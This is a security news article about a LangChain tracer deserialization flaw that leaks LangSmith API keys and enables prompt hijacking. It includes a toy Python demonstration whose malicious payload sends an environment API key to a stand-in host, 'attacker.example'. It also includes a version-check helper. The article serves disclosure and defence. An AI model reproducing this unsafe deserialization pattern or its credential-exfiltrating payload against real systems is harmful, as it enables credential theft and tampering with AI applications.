CVE-2026-44843: LangChain Flaw Lets Single Chat Message Steal API Keys and Hijack AI Prompts
A single chat message is all it takes. CVE-2026-44843, a vulnerability in LangChain's framework, enables attackers to steal credentials and hijack AI application behavior through a malicious payload delivered via a chat interface. The flaw resides in LangChain's tracer component, which deserializes untrusted data, granting remote attackers administrative access to a victim's LangSmith workspace.
The attack chain exploits LangChain's deserialization handling. When a malicious payload is processed by the tracer, it can instantiate classes such as HubRunnable, triggering outbound network requests that exfiltrate LangSmith API keys from the server's environment variables. Once an attacker obtains a valid API key, they gain write access to production prompts—the core instructions governing AI application behavior. This creates a persistent compromise vector: modified prompts can silently redirect outputs, inject malicious content, or manipulate decision-making logic without triggering conventional security alerts.
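The core pattern described above — a deserializer that instantiates whatever class a payload names, where a constructor's side effect leaks a secret from the environment — can be sketched with a toy example. This is a hypothetical illustration of the vulnerability class, not LangChain's actual tracer code; the class names (`HubFetcher`), registry, and `unsafe_loads` function are invented for demonstration, and the "network request" is simulated by appending to a list.

```python
import os

# A toy class registry standing in for a framework's deserializable types.
REGISTRY = {}

def register(cls):
    REGISTRY[cls.__name__] = cls
    return cls

@register
class Greeting:
    """A benign type an application legitimately deserializes."""
    def __init__(self, text):
        self.text = text

EXFILTRATED = []  # stands in for an attacker-controlled server

@register
class HubFetcher:
    """Hypothetical analogue of a class whose constructor makes an
    outbound request -- the trait the article attributes to HubRunnable."""
    def __init__(self, url):
        # In a real exploit the secret leaves via an HTTP request; here we
        # only record it to make the data flow visible.
        secret = os.environ.get("LANGSMITH_API_KEY", "")
        EXFILTRATED.append(url.format(key=secret))

def unsafe_loads(payload: dict):
    """The dangerous pattern: instantiate any registered class the
    (untrusted) payload names, with attacker-controlled arguments."""
    cls = REGISTRY[payload["type"]]
    return cls(**payload["kwargs"])

# A benign payload and a malicious one travel the same code path.
os.environ["LANGSMITH_API_KEY"] = "ls-demo-secret"
unsafe_loads({"type": "Greeting", "kwargs": {"text": "hi"}})
unsafe_loads({"type": "HubFetcher",
              "kwargs": {"url": "https://attacker.example/?k={key}"}})
print(EXFILTRATED[0])
```

The mitigation the patch space generally uses is an allowlist: refuse to instantiate any class whose construction has side effects, rather than trusting whatever type name arrives in the payload.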
The vulnerability has been patched in langchain-core versions 1.3.3 and 0.3.85, and organizations using LangChain are advised to upgrade to prevent exploitation. The disclosure underscores a broader risk in AI infrastructure: deserialization vulnerabilities in ML frameworks can cascade into full workspace compromise, turning developer tooling into an attack surface. With LangChain widely adopted for building LLM-powered applications, the potential exposure spans enterprises, startups, and research institutions relying on the framework for production AI systems.
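Teams auditing their deployments can gate on the two fixed versions named above. The sketch below is a minimal version check assuming simple three-part semantic versions and only the two release lines the advisory mentions (0.3.x and 1.x); the `is_patched` helper is illustrative, not part of any official tooling.

```python
def is_patched(ver: str) -> bool:
    """Return True if a langchain-core version includes the fix.

    Assumes the thresholds from the advisory: 1.3.3 on the 1.x line
    and 0.3.85 on the 0.3.x line.
    """
    parts = tuple(int(p) for p in ver.split(".")[:3])
    if parts[0] >= 1:
        return parts >= (1, 3, 3)
    return parts >= (0, 3, 85)

print(is_patched("0.3.84"))  # → False (vulnerable)
print(is_patched("0.3.85"))  # → True
print(is_patched("1.3.3"))   # → True
```

In practice the installed version can be read with `importlib.metadata.version("langchain-core")` and passed to a check like this before deciding whether an upgrade is required.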